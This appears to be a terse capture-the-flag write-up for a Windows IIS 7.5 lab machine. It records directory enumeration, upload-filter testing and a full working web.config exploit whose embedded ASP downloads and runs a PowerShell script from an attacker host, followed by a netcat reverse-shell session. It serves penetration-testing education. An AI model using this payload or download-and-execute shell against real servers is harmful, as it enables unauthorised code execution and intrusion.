2 :80

===============================================================
2021/05/03 17:53:31 Starting gobuster in directory enumeration mode
===============================================================
/transfer.aspx        (Status: 200) [Size: 941]
/UploadedFiles        (Status: 301) [Size: 156] [--> http://10.10.10.93/UploadedFiles/]
/aspnet_client

<input type="submit" name="btnUpload" value="Upload" onclick="return ValidateFile();" id="btnUpload" />

.png files work and are viewable when uploaded.
.asp and .aspx fail; time to experiment with file extensions.
Cannot upload with double extensions or null-byte file extensions.

Searching for an IIS 7.5 file upload exploit shows there is an RCE using web.config on IIS (the extension checks block .asp/.aspx, but web.config is not on that denylist, and a handler mapping inside it makes IIS run .config files through asp.dll):
https://soroush.secproject.com/blog/tag/unrestricted-file-upload/
web.config:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <handlers accessPolicy="Read, Script, Write">
            <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
        </handlers>
        <security>
            <requestFiltering>
                <fileExtensions>
                    <remove fileExtension=".config" />
                </fileExtensions>
                <hiddenSegments>
                    <remove segment="web.config" />
                </hiddenSegments>
            </requestFiltering>
        </security>
    </system.webServer>
    <appSettings>
    </appSettings>
</configuration>
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd.exe /c powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.15/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.93] 49160
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

whoami
bounty\merlin
